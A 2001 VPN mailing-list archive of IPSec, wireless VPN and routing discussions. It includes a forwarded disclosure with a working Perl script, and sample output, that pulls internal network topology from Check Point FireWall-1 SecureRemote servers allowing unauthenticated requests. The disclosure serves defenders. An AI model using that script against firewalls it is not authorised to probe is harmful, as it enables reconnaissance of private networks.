to be otherwise enforceable in such jurisdiction. ------------------------------------------------------------------------ VPN is sponsored by SecurityFocus.com From Joel.Snyder at Opus1.COM Mon Jul 9 18:54:42 2001 From: Joel.Snyder at Opus1.COM (Joel M Snyder) Date: Mon, 09 Jul 2001 15:54:42 -0700 (MST) Subject: IPSec between PIX and the Nokia CC500 In-Reply-To: "Your message dated Mon, 09 Jul 2001 11:26:02 +0200 (CEST)" Message-ID: <01K5QE09UE60934PJM@Opus1.COM> >Has anyone information to share about the subject? (IKE + IPSec) What do you want to know? It works great with both pre-shared secrets and certificates. I tested it as recently as last week using DHG2/PFS/3DES/SHA1 and had no problem initiating an SA from either side. jms Joel M Snyder, 1404 East Lind Road, Tucson, AZ, 85719 Phone: +1 520 324 0494 x101 (v) +1 520 324 0495 (FAX) jms at Opus1.COM http://www.opus1.com/jms Opus One VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Wed Jul 11 13:28:05 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Wed, 11 Jul 2001 12:28:05 -0500 (CDT) Subject: Win2k IPsec Troubleshooting Message-ID: http://support.microsoft.com/support/kb/articles/Q257/2/25.ASP VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com VPN is sponsored by SecurityFocus.com From rahul_next at hotmail.com Thu Jul 12 00:57:20 2001 From: rahul_next at hotmail.com (Rahul 18) Date: Thu, 12 Jul 2001 12:57:20 +0800 Subject: Question on VPN!!!!!! Message-ID: Hello my name is Jay from Malaysia... I am in college and have problems not >only in questions about Virtual Private Networking but also have an >assignment on which need a lot of explanation on VPN... > >1) What is VPN? Explain how VPN benefits an organization? >2) Identify at least 2 items at each site that need to be upgraded >3) Identify the necessary intermediate telecommunication facilities > required to establish the VPN >4) Breifly outline the future expansion of the above VPN to help drive > a company participating in E-Commerce businesses > >Hope some questions for my assignments will be answered as well as some of >my personal questions for my better understanding. > >I really like to take this time to congratulate you on having the best site >on VPN information. I think almost all my friends know about your site. > >Hope you mail me As Soon As Possible >Yours truly, >Jay _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. VPN is sponsored by SecurityFocus.com From shope at energis-eis.co.uk Thu Jul 12 09:17:48 2001 From: shope at energis-eis.co.uk (Stephen Hope) Date: Thu, 12 Jul 2001 14:17:48 +0100 Subject: CERT Advisory CA-2001-17 Message-ID: <73BE32DA9E55D511ACF30050BAEA04870494E2@email.datarange.co.uk> Liam, i believe that this "RDP" as a proprietary protocol used by Checkpoint rather than the RFC compliant RDP. regards Stephen Stephen Hope C. Eng, Network Consultant, shope at energis-eis.co.uk, Energis Integration Services Ltd, WWW: http://www.energis-eis.co.uk Carrington Business Park, Carrington, Manchester , UK. M31 4ZU Tel: +44 (0)161 776 4194 Mob: +44 (0)7767 256 180 Fax: +44 (0)161 776 4189 > -----Original Message----- > From: Liam Randall [mailto:lrandall at isa-inc.com] > Sent: 09 July 2001 20:44 > To: vpn at securityfocus.com > Subject: FW: CERT Advisory CA-2001-17 > > > Everyone catch this yet: > > -----Original Message----- > From: CERT Advisory [mailto:cert-advisory at cert.org] > Sent: Monday, July 09, 2001 1:33 PM > To: cert-advisory at cert.org > Subject: CERT Advisory CA-2001-17 > > > > -----BEGIN PGP SIGNED MESSAGE----- > > CERT Advisory CA-2001-17 Check Point RDP Bypass Vulnerability > > Original release date: July 09, 2001 > Last revised: -- > Source: CERT/CC > > A complete revision history is at the end of this file. > > Systems Affected > > * Check Point VPN-1 and FireWall-1 Version 4.1 > > Overview > > A vulnerability in Check Point FireWall-1 and VPN-1 may allow an > intruder to pass traffic through the firewall on port 259/UDP. > > I. Description > > Inside Security GmbH has discovered a vulnerability in Check Point > FireWall-1 and VPN-1 that allows an intruder to bypass the > firewall. > The default FireWall-1 management rules allow arbitrary > RDP (Reliable > Data Protocol) connections to traverse the firewall. RFC-908 and > RFC-1151 describe the Reliable Data Protocol (RDP). Quoting from > RFC-908: > > The Reliable Data Protocol (RDP) is designed to provide > a reliable > data transport service for packet-based applications > such as remote > loading and debugging. > > RDP was designed to have much of the same functionality as TCP, but > it > has some advantages over TCP in certain situations. FireWall-1 and > VPN-1 include support for RDP, but they do not provide adequate > security controls. Quoting from the advisory provided by Inside > Security GmbH: > > By adding a faked RDP header to normal UDP traffic any > content can > be passed to port 259 on any remote host on either side of the > firewall. > > For more information, see the Inside Security GmbH > security advisory, > available at > > http://www.inside-security.de/advisories/fw1_rdp.html > > Although the CERT/CC has not seen any incident activity related to > this vulnerability, we do recommend that all affected sites upgrade > their Check Point software as soon as possible. > > II. Impact > > An intruder can pass UDP traffic with arbitrary content through the > firewall on port 259 in violation of implied security policies. > > If an intruder can gain control of a host inside the > firewall, he may > be able to use this vulnerability to tunnel arbitrary > traffic across > the firewall boundary. > > Additionally, even if an intruder does not have control of a host > inside the firewall, he may be able to use this vulnerability as a > means of exploiting another vulnerability in software listening > passively on the internal network. > > Finally, an intruder may be able to use this vulnerability > to launch > certain kinds of denial-of-service attacks. > > III. Solutions > > Install a patch from Check Point Software Technologies. More > information is available in Appendix A. > > Until a patch can be applied, you may be able to reduce > your exposure > to this vulnerability by configuring your router to block access to > 259/UDP at your network perimeter. > > Appendix A > > Check Point > > Check Point has issued an alert for this vulnerability at > > http://www.checkpoint.com/techsupport/alerts/ > > Download the patch from Check Point's web site: > > http://www.checkpoint.com/techsupport/downloads.html > > Appendix B. - References > > 1. http://www.inside-security.de/advisories/fw1_rdp.html > 2. http://www.kb.cert.org/vuls/id/310295 > 3. http://www.ietf.org/rfc/rfc908.txt > 4. http://www.ietf.org/rfc/rfc1151.txt > _________________________________________________________________ > > Our thanks to Inside Security GmbH for the information contained in > their advisory. > _________________________________________________________________ > > This document was written by Ian A. Finlay. If you have feedback > concerning this document, please send email to: > > mailto:cert at cert.org?Subject=Feedback CA-2001-17 [VU#310295] > > Copyright 2001 Carnegie Mellon University. > > Revision History > July 09, 2001: Initial Release > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 5.0i for non-commercial use > Charset: noconv > > iQCVAwUBO0njBQYcfu8gsZJZAQHOCAP+L8JEWTsWqvWjZQaVpHPb6GHn7D837lzc > rE/ef50+6xSzRZyBPXQ8+3N6JqYk8PBufYCcqtiqL1PfNJw3YfrGJ5irzS4ENXTg > mupUNTfdG0UhEAOWJbsjykfB0K/PPaeFrtf1jod1zd9uKPIFytHLAzMHWzUwTTtW > 4qSlIxoiHEQ= > =v8vs > -----END PGP SIGNATURE----- > > VPN is sponsored by SecurityFocus.com > VPN is sponsored by SecurityFocus.com From Phil.Cox at SystemExperts.com Thu Jul 12 23:43:57 2001 From: Phil.Cox at SystemExperts.com (Phil Cox) Date: Thu, 12 Jul 2001 20:43:57 -0700 Subject: Wireless VPNs In-Reply-To: <4.3.2.7.2.20010706144210.00b4fb50@mail2.netreach.net> Message-ID: All, I am doing research on Wireless VPN's. In particular I am looking for problems that people are having to overcome when developing and/or implementing them. I can only really think of the following, and am looking for any others that folks have seen: - Resources (CPU, Memory) on handhelds - "Lossy"ness of wireless networks - Lack of ability of deployed devices to support VPN clients (i.e., old phones and handhelds) Any thoughts about problems, and potential solutions are appreciated. Also, I would be very interested in any implementations that you use, and why you like them (or not). Any and all comments are appreciated. Phil VPN is sponsored by SecurityFocus.com From shope at energis-eis.co.uk Mon Jul 16 06:24:47 2001 From: shope at energis-eis.co.uk (Stephen Hope) Date: Mon, 16 Jul 2001 11:24:47 +0100 Subject: Wireless VPNs Message-ID: <73BE32DA9E55D511ACF30050BAEA04870494F7@email.datarange.co.uk> Phil, a list of issues which came up with some stuff we were involved in. We were only doing "raw" wireless for LAN access in enterprise environments, rather than VPN on top of wireless. We were working with Cisco Aeronet gear, but i suspect these points are more general. 1. Op sys integration - the wireless drivers were awkward to integrate into Win 95, especially in laptops already set up to use Xircom 100 M Ethernet. Much less hassle with Win 98. 2. Op sys stability - again Win 95 can have tantrums when the wireless link vanishes and applications loose their connections - seems to be a general problem that the op sys and apps make assumptions about connections not vanishing during use, and dont recover well..... 3. Roaming needs layer 2 connectivity between the access points. 1 customer wants their developers to be able to roam throughout a campus, but also just replaced an ATM backbone with a "pure" layer 3 switched campus. The roaming requirement means the wireless points need a single VLAN smeared over the campus, spanning tree to control the backbone resilience and loops, and generally doesnt fit into the layer 3 backbone design. It doesnt help that there are 2 manufacturers equipment involved, and no common VLANs across campus... NB - the developers have found that they can take a laptop into a separate cafeteria on the other side of a public road and get a working link there (not enough meeting rooms) - but the security team didnt like the implications for security outside the building structure. 4. Dead spots. Things that have caused issues with coverage are: building design (get much better signal coverage along the girders in the floor / ceiling / wall rather than at 45 degree lines). metalwork - computer rooms and storage racking seem to give problems. i didnt have any trouble with gold film coated windows, but that may depend on the amount of glass. Generally, i have been pleasantly surprised about the way this stuff works - i expected more problems with black magic than we got in practise. regards Stephen Stephen Hope C. Eng, Network Consultant, shope at energis-eis.co.uk, Energis Integration Services Ltd, WWW: http://www.energis-eis.co.uk Carrington Business Park, Carrington, Manchester , UK. M31 4ZU Tel: +44 (0)161 776 4194 Mob: +44 (0)7767 256 180 Fax: +44 (0)161 776 4189 > -----Original Message----- > From: Phil Cox [mailto:Phil.Cox at SystemExperts.com] > Sent: 13 July 2001 04:44 > To: vpn at securityfocus.com > Subject: Wireless VPNs > > > All, > > I am doing research on Wireless VPN's. In particular I am looking for > problems that people are having to overcome when developing and/or > implementing them. I can only really think of the following, > and am looking > for any others that folks have seen: > > - Resources (CPU, Memory) on handhelds > - "Lossy"ness of wireless networks > - Lack of ability of deployed devices to support VPN clients > (i.e., old > phones and handhelds) > > Any thoughts about problems, and potential solutions are appreciated. > > Also, I would be very interested in any implementations that > you use, and > why you like them (or not). > > Any and all comments are appreciated. > > Phil > > > VPN is sponsored by SecurityFocus.com > VPN is sponsored by SecurityFocus.com From Skip.Romero at ngb.army.mil Mon Jul 16 06:44:00 2001 From: Skip.Romero at ngb.army.mil (Romero, Skip Mr NGB-ARNG) Date: Mon, 16 Jul 2001 06:44:00 -0400 Subject: Wireless VPNs Message-ID: <56969875BA38D411940300204840ECE301187C76@NGB-66C05-XCH92> Phil, One of the most innovative solutions that government is using is the Blackberry (www.blackberry.net). This product has the required security features needed for government standards.. Regards... Skip Santos (Skip) Romero, DOD Certified FSO Information Assurance Security Officer National Guard Bureau, Information Systems Division Senior Information Assurance Policy & Procedures Architect Email: skip.romero at ngb.army.mil www.ngb.dtic.mil Member: Information Assurance Technical Forum (NSA) - www.iatf.net FBI-INFRAGARD - www.infragard.net -----Original Message----- From: Phil Cox [SMTP:Phil.Cox at SystemExperts.com] Sent: Thursday, July 12, 2001 11:44 PM To: vpn at securityfocus.com Subject: Wireless VPNs All, I am doing research on Wireless VPN's. In particular I am looking for problems that people are having to overcome when developing and/or implementing them. I can only really think of the following, and am looking for any others that folks have seen: - Resources (CPU, Memory) on handhelds - "Lossy"ness of wireless networks - Lack of ability of deployed devices to support VPN clients (i.e., old phones and handhelds) Any thoughts about problems, and potential solutions are appreciated. Also, I would be very interested in any implementations that you use, and why you like them (or not). Any and all comments are appreciated. Phil VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From jsdy at cospo.osis.gov Mon Jul 16 11:58:04 2001 From: jsdy at cospo.osis.gov (Joseph S D Yao) Date: Mon, 16 Jul 2001 11:58:04 -0400 Subject: Question on VPN!!!!!! In-Reply-To: ; from rahul_next@hotmail.com on Thu, Jul 12, 2001 at 12:57:20PM +0800 References: Message-ID: <20010716115804.D2360@washington.cospo.osis.gov> On Thu, Jul 12, 2001 at 12:57:20PM +0800, Rahul 18 wrote: > Hello my name is Jay from Malaysia... I am in college and have problems not > >only in questions about Virtual Private Networking but also have an > >assignment on which need a lot of explanation on VPN... > > > >1) What is VPN? Explain how VPN benefits an organization? > >2) Identify at least 2 items at each site that need to be upgraded > >3) Identify the necessary intermediate telecommunication facilities > > required to establish the VPN > >4) Breifly outline the future expansion of the above VPN to help drive > > a company participating in E-Commerce businesses > > > >Hope some questions for my assignments will be answered as well as some of > >my personal questions for my better understanding. > > > >I really like to take this time to congratulate you on having the best site > >on VPN information. I think almost all my friends know about your site. > > > >Hope you mail me As Soon As Possible > >Yours truly, > >Jay Rahul or Jay or whoever, You really learn a lot better by NOT having people answer your homework questions. A "virtual" network is carried by some technology over another network as if it were an actual physical network - but it's not. A private one is used by a limited number of people, vs. a public network. Some technologies for creating a virtual network include encapsulation, encryption and encapsulation, and use of another type of network such as ATM. Nopt all of these are commonly called VPN, however. >From this information, you may be able to piece together a definition of a VPN - but for a "correct" one, study your materials and the Web site. From this, you should also be able to answer the rest of the questions as well. -- Joe Yao jsdy at cospo.osis.gov - Joseph S. D. Yao OSIS Center Computer Support EMT-B ----------------------------------------------------------------------- This message is not an official statement of COSPO policies. VPN is sponsored by SecurityFocus.com From angus at tellme.com Mon Jul 16 18:10:57 2001 From: angus at tellme.com (Angus Davis) Date: Mon, 16 Jul 2001 15:10:57 -0700 Subject: Red Creek Ravlin 10 / Checkpoint FW-1 Interoperability? Message-ID: <3B536671.FF6D7ED2@tellme.com> Hello, We're pulling our hair out trying to get our Ravlin 10/5100 to behave nicely to run a VPN with our customer's Checkpoint FW-1. Does anyone have experience getting these two to work together? We've turned off aggressive mode on the FW1, we have PFS off, we have the latest version of the Ravlin firmware installed, shared-keys, etc. Still, we experience intermittent problems with or following rekey negotiation. Has anyone been able to get these two to co-exist? Thanks in advance for any help, -angus VPN is sponsored by SecurityFocus.com From mikhail.sobolev at transas.com Tue Jul 17 12:11:51 2001 From: mikhail.sobolev at transas.com (Mikhail Sobolev) Date: Tue, 17 Jul 2001 17:11:51 +0100 Subject: Requirements for a certificate to be used in PGPnet. Message-ID: <20010717171151.A10810@transas.co.uk> I'm struggling with PGPnet. Having successfully created the appropriate certificates, I am unable to use them in PGPnet program. I tried to look for the information on Internet, but failed. The short version of my problem: when trying to specify my gateway's certificate, I get 'Invalid IASN for selected certificate'. I would appreciate if somebody could give me some hints. Thanks, -- Misha PS I already tried several mailing lists, but got no response. VPN is sponsored by SecurityFocus.com From Patrick.Bryan at abbott.com Tue Jul 17 12:35:30 2001 From: Patrick.Bryan at abbott.com (Patrick.Bryan at abbott.com) Date: Tue, 17 Jul 2001 11:35:30 -0500 Subject: Hybrid WAN implementing VPN Message-ID: Has anyone considered and or successfuly implemented a Hybrid WAN making using of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwith between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site. The issue I am trying to overcome, is that this creates a loop between the router and the VPN engine. Am I way off here? VPN is sponsored by SecurityFocus.com From cgripp at axcelerant.com Tue Jul 17 13:03:46 2001 From: cgripp at axcelerant.com (Christopher Gripp) Date: Tue, 17 Jul 2001 10:03:46 -0700 Subject: Hybrid WAN implementing VPN Message-ID: <4EBB5C35607E7F48B4AE162D956666EF3390C3@guam.corp.axcelerant.com> I would think the VPN box and router at both locations would have to understand that only certain ports are directed through the VPN. Christopher S. Gripp Systems Engineer Axcelerant -----Original Message----- From: Patrick.Bryan at abbott.com [mailto:Patrick.Bryan at abbott.com] Sent: Tuesday, July 17, 2001 9:36 AM To: vpn at securityfocus.com Subject: Hybrid WAN implementing VPN Has anyone considered and or successfuly implemented a Hybrid WAN making using of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwith between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site. The issue I am trying to overcome, is that this creates a loop between the router and the VPN engine. Am I way off here? VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From sandy at storm.ca Tue Jul 17 13:30:03 2001 From: sandy at storm.ca (Sandy Harris) Date: Tue, 17 Jul 2001 13:30:03 -0400 Subject: Hybrid WAN implementing VPN References: Message-ID: <3B54761B.1B232314@storm.ca> Patrick.Bryan at abbott.com wrote: > > Has anyone considered and or successfuly implemented a Hybrid WAN making using > of a VPN for non time sensitive / non critical data? For example, you have > frame links between sites A, B, and C. Rather than increase bandwith between > sites, it seems to me that I can route secondary types of traffic over > Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set > an input filter on my routers to forward any ftp traffic to VPN boxes at each > site. ... I don't have an answer to your questions, unless your ruoters are Linux boxes, in which case have a look at the advanced routing stuff in recent kernels. However, you might want to consider the argument that in implementing a VPN, you should encrypt as much as you possibly can rather than just what seems necessary: http://www.freeswan.org/freeswan_trees/freeswan-1.91/doc/ipsec.html#traffic.resist I'm not sure how this might apply in your case, or even that it does, but it seemed worth mentioning. VPN is sponsored by SecurityFocus.com From shope at energis-eis.co.uk Tue Jul 17 15:49:44 2001 From: shope at energis-eis.co.uk (Stephen Hope) Date: Tue, 17 Jul 2001 20:49:44 +0100 Subject: Hybrid WAN implementing VPN Message-ID: <73BE32DA9E55D511ACF30050BAEA0487049513@email.datarange.co.uk> Patrick, cant help directly, but i can give you some encouragement - it is feasible within a routed network. we have done this for low priority traffic using a UK -US link with backup via satellite. what we did was build a "pure" routed link with the satellite costed so it was not the preferred path. We then used traffic filter to select the stuff we wanted diverted (printer spool and mail server to server stuff in our case). If the VPN tunnel terminates on the router with the traffic filters, then the filter can be sensitive to "next hop" being available - that way the 2 links back each other up under fault conditions. Or, you can set up the filterss to break the low priority stuff when the VPN is down... i suggest you look at a router based VPN - you are going to want to have a routing protocol and traffic filtersto control routes and fallback under fault conditions - static routes on the VPN gateway type systems will make your immplementation more difficult. regards Stephen Stephen Hope C. Eng, Network Consultant, shope at energis-eis.co.uk, Energis Integration Services Ltd, WWW: http://www.energis-eis.co.uk Carrington Business Park, Carrington, Manchester , UK. M31 4ZU Tel: +44 (0)161 776 4194 Mob: +44 (0)7767 256 180 Fax: +44 (0)161 776 4189 > -----Original Message----- > From: Patrick.Bryan at abbott.com [mailto:Patrick.Bryan at abbott.com] > Sent: 17 July 2001 17:36 > To: vpn at securityfocus.com > Subject: Hybrid WAN implementing VPN > > > Has anyone considered and or successfuly implemented a Hybrid > WAN making using > of a VPN for non time sensitive / non critical data? For > example, you have > frame links between sites A, B, and C. Rather than increase > bandwith between > sites, it seems to me that I can route secondary types of traffic over > Lan-to-Lan VPN links. Using ftp as an example, it seems I > would be able to set > an input filter on my routers to forward any ftp traffic to > VPN boxes at each > site. The issue I am trying to overcome, is that this creates > a loop between > the router and the VPN engine. Am I way off here? > > > VPN is sponsored by SecurityFocus.com > VPN is sponsored by SecurityFocus.com From guy.raymakers at eds.com Wed Jul 18 02:35:26 2001 From: guy.raymakers at eds.com (Raymakers, Guy) Date: Wed, 18 Jul 2001 07:35:26 +0100 Subject: Hybrid WAN implementing VPN Message-ID: Patrick, It's possible to do, we use it in combination with Satellite links and we don't have any troubles with routing loops. Guy -----Original Message----- From: Patrick.Bryan at abbott.com [mailto:Patrick.Bryan at abbott.com] Sent: Tuesday, July 17, 2001 18:36 To: vpn at securityfocus.com Subject: Hybrid WAN implementing VPN Has anyone considered and or successfuly implemented a Hybrid WAN making using of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwith between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site. The issue I am trying to overcome, is that this creates a loop between the router and the VPN engine. Am I way off here? VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From ng_son99 at hotmail.com Wed Jul 18 03:09:30 2001 From: ng_son99 at hotmail.com (Nguyen Son) Date: Wed, 18 Jul 2001 15:09:30 +0800 Subject: How to test security of VPN References: <56969875BA38D411940300204840ECE301187C76@NGB-66C05-XCH92> Message-ID: Hi All, I have one Window 2000 Server box (SP2) and I have setup a VPN. I am very new to VPN as well as Win 2k now i have two problems: 1 users can only access to the server though dialup. I have try to connect to VPN server from a network but I got an error 650 saying that "The computer you're dialing in to does not respond to a network reques" 2 Is there any tools to test the security of VPN and (or) window box for known issues. at the momment i am interrested to see the encrypted password and user name and how can i dertermine that packets send through other netwotk is encrypted, How can i know VPN is using PPTP or L2TP or IPSec If these questions are too broad to explain, can someone point out any good web sites,books for reference . If you need more info please ask TIA Son VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Wed Jul 18 10:25:10 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Wed, 18 Jul 2001 09:25:10 -0500 (CDT) Subject: Firewall-1 Information leak (fwd) Message-ID: People out there using SecureRemote and FireWall-1 for their remote access VPN: ---------- Forwarded message ---------- Date: Wed, 18 Jul 2001 03:29:28 +0200 (SAST) From: Haroon Meer To: bugtraq at securityfocus.com Subject: Firewall-1 Information leak Hi. Checkpoint Firewall-1 makes use of a piece of software called SecureRemote to create encrypted sessions between users and FW-1 modules. Before remote users are able to communicate with internal hosts, a network topology of the protected network is downloaded to the client. While newer versions of the FW-1 software have the ability to restrict these downloads to only authenticated sessions, the default setting allows unauthenticated requests to be honoured. This gives a potential attacker a wealth of information including ip addresses, network masks (and even friendly descriptions) The attached file will connect to the firewall, and download the toplogy (if SecureRemote is running) (it is a tiny perl file, which needs only Socket, so avoids the hassle of having to install the SecureRemote client to test a firewall-1) --snip-- SensePost# perl sr.pl firewall.victim.com Testing on port 256 :val ( :reply ( : (-SensePost-dotcom-.hal9000-19.3.167.186 :type (gateway) :is_fwz (true) :is_isakmp (true) :certificates () :uencapport (2746) :fwver (4.1) :ipaddr (19.3.167.186) :ipmask (255.255.255.255) :resolve_multiple_interfaces () :ifaddrs ( : (16.3.167.186) : (12.20.240.1) : (16.3.170.1) : (29.203.37.97) ) :firewall (installed) :location (external) :keyloc (remote) :userc_crypt_ver (1) :keymanager ( :type (refobj) :refname ("#_-SensePost-dotcom-") ) :name (-SensePost-dotcom-Neo16.3.167.189) :type (gateway) :ipaddr (172.29.0.1) :ipmask (255.255.255.255) ) --snip-- Haroon Meer +27 837866637 haroon at sensepost.com http://www.sensepost.com -------------- next part -------------- #!/usr/bin/perl # A Command-line tool that can be used to download network Topology # from Firewall-1's running SecureRemote, with the option "Allow un # authenticated cleartext topology downloads". # Usage sr.pl IP # Haroon Meer & Roelof Temmingh 2001/07/17 # haroon at sensepost.com - http://www.sensepost.com use Socket; if ($#ARGV<0) {die "Usage: sr.pl IP\n";} $port=256; $target=inet_aton($ARGV[0]); print "Testing $host on port $port\n"; $SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00"; $SENDY = pack("H*",$SENDY); @results=sendraw($SENDY); if ($#results == 0) { print "No results on port 256 - trying 264\n"; $port=264; @results2=sendraw($SENDY); if ($#results2 == 0) {die "Sorry - no results\n";} } else {print @results;} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } else { return ""; } } # Spidermark: sensepostdata fw1 -------------- next part -------------- VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Wed Jul 18 10:53:59 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Wed, 18 Jul 2001 09:53:59 -0500 (CDT) Subject: Firewall-1 Information leak (fwd) Message-ID: A correction to the earlier posting. VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com ---------- Forwarded message ---------- Date: Wed, 18 Jul 2001 11:01:33 +0200 From: Lars Troen To: Haroon Meer Cc: bugtraq at securityfocus.com Subject: RE: Firewall-1 Information leak Haaron, The default setting in 4.1SP1 (CP2000) and later is *not* to respond to unauthenticated topology downloads. You must check the box in Policy Properties in order to activate it. Lars -----Original Message----- From: Haroon Meer [mailto:haroon at sensepost.com] Sent: Wednesday, July 18, 2001 03:29 To: bugtraq at securityfocus.com Subject: Firewall-1 Information leak VPN is sponsored by SecurityFocus.com From Jfunke at kortexcomputer.com Wed Jul 18 17:08:05 2001 From: Jfunke at kortexcomputer.com (Justin Funke) Date: Wed, 18 Jul 2001 16:08:05 -0500 Subject: Desktop Nics with Cryptography offloading Message-ID: <0FA4FC04D3B1D411B34F0090275BE0630126D386@SM-MAIL> I have specifically asked Intel if these "S" series NICs would offload the encryption/decryption for standard "public" VPN's vs "LAN" encrypted communications. They claim that it is not possible but I don't see how this is true. If it is offloading IPSEC traffic how does the nic know what is public vs. private traffic. http://www.intel.com/network/connectivity/resources/doc_library/data_sheets/ pro100s.pdf And if it does have a way of detecting it - couldn't the traffic be encapsulated to trick the Nic into thinking it was a local connection. Any ideas? Thanks, Justin VPN is sponsored by SecurityFocus.com From jsdy at cospo.osis.gov Wed Jul 18 17:39:11 2001 From: jsdy at cospo.osis.gov (Joseph S D Yao) Date: Wed, 18 Jul 2001 17:39:11 -0400 Subject: Firewall-1 Information leak (fwd) In-Reply-To: ; from tbird@precision-guesswork.com on Wed, Jul 18, 2001 at 09:53:59AM -0500 References: Message-ID: <20010718173911.A19523@washington.cospo.osis.gov> On Wed, Jul 18, 2001 at 09:53:59AM -0500, Tina Bird wrote: > A correction to the earlier posting. ... > ---------- Forwarded message ---------- > Date: Wed, 18 Jul 2001 11:01:33 +0200 > From: Lars Troen ... > The default setting in 4.1SP1 (CP2000) and later is *not* to respond to > unauthenticated topology downloads. You must check the box in Policy > Properties in order to activate it. Excuse me? If it is a default setting, why do you have to check a box to activate it? [Having mulled over this for some seconds now ...] Or do you mean what you did NOT say, which is that there is a box one may check in Policy Properties to activate responding to topology downloads even if they are not authenticated? -- Joe Yao jsdy at cospo.osis.gov - Joseph S. D. Yao OSIS Center Computer Support EMT-B ----------------------------------------------------------------------- This message is not an official statement of COSPO policies. VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Thu Jul 19 11:01:38 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Thu, 19 Jul 2001 10:01:38 -0500 (CDT) Subject: [fw-wiz] VPN help !! please (fwd) Message-ID: ---------- Forwarded message ---------- Date: Thu, 19 Jul 2001 08:10:39 -0500 From: Bill Asher To: "Firewall Wizard Mailing List (E-mail)" Subject: [fw-wiz] VPN help !! please My network: ba-fw01 PPP 199.217.219.121 199.217.219.126 Home LAN -- Firewall(ba-fw01) -- modem -->internet<-- Router -- Firewall(fw02) -- Office LAN 10.2.2.X -- 10.2.2.1 -- modem -->internet<-- 10.0.0.1 -- 10.0.0.x I'm having a few issues getting my VPN tunnel made. Below are my config files, I used jixen.tripod.com RoadWarrior as an example. I am a bit confused on the left and right aspects for each location. I have read that the configs should be identical, while other examples show the left and right information swapping for each firewall. I have also added: ipchains -A forward -i $GREEN_DEV -d $GREEN_NETADDRESS/$GREEN_NETMASK -j ACCEPT to each firewall's rc.firewall.up config. Also, what exactly should be in my ipsec.secrets config file?? Any suggestions, show me where I'm going wrong!! Thanks, Bill ######### Configs #################### # Road - Work VPN # Road /etc/ipsec.conf config file - 7/16/01 config setup interfaces=%defaultroute klipsdebug=none plutodebug=none plutoload=%search plutostart=%search conn %default keyingtries=1 conn road-work left=%defaultroute leftsubnet= leftnexthop= right=199.217.219.126 rightsubnet=10.0.0.0/8 rightnexthop=199.217.219.121 auto=start authby=rsasig leftid=@ba-fw01.basher.com rightid=@fw02.schultz-design.com leftrsasigkey=0x0A rightrsasigkey=0x0B # Road - Work VPN # Work /etc/ipsec.conf config file - 7/16/01 config setup interfaces="ipsec0=eth2" klipsdebug=none plutodebug=none plutoload=%search plutostart=%search conn %default keyingtries=1 conn road-work left=0.0.0.0 leftsubnet= leftnexthop= right=199.217.219.126 rightsubnet=10.0.0.0/8 rightnexthop=199.217.219.121 auto=add authby=rsasig leftid=@ba-fw01.basher.com rightid=@fw02.schultz-design.com leftrsasigkey=0x0A rightrsasigkey=0x0B Error Messages: root at ba-fw01~# ipsec setup --restart ipsec_setup: Stopping FreeS/WAN IPSEC... ipsec_setup: Starting FreeS/WAN IPSEC 1.8... ipsec_setup: WARNING: ipsec0 has route filtering turned on, KLIPS may not work ipsec_setup: (/proc/sys/net/ipv4/conf/ipsec0/rp_filter = `1', should be 0) ipsec_setup: WARNING: ppp0 has route filtering turned on, KLIPS may not work ipsec_setup: (/proc/sys/net/ipv4/conf/ppp0/rp_filter = `1', should be 0) ipsec_setup: 102 "road-work" #1: STATE_MAIN_I1: initiate ipsec_setup: 104 "road-work" #1: STATE_MAIN_I2: from STATE_MAIN_I1; sent MI2, expecting MR2 ipsec_setup: 106 "road-work" #1: STATE_MAIN_I3: from STATE_MAIN_I2; sent MI3, expecting MR3 ipsec_setup: 003 "road-work" #1: SIG did not decrypt into good ECB: no leading 00. Bad key? ipsec_setup: 217 "road-work" #1: STATE_MAIN_I3: INVALID_KEY_INFORMATION ipsec_setup: 010 "road-work" #1: STATE_MAIN_I3: retransmission; will wait 20s for response ipsec_setup: 003 "road-work" #1: SIG did not decrypt into good ECB: no leading 00. Bad key? ipsec_setup: 217 "road-work" #1: STATE_MAIN_I3: INVALID_KEY_INFORMATION ipsec_setup: 010 "road-work" #1: STATE_MAIN_I3: retransmission; will wait 40s for response ipsec_setup: 003 "road-work" #1: SIG did not decrypt into good ECB: no leading 00. Bad key? ipsec_setup: 217 "road-work" #1: STATE_MAIN_I3: INVALID_KEY_INFORMATION ipsec_setup: 031 "road-work" #1: max number of retransmissions (2) reached 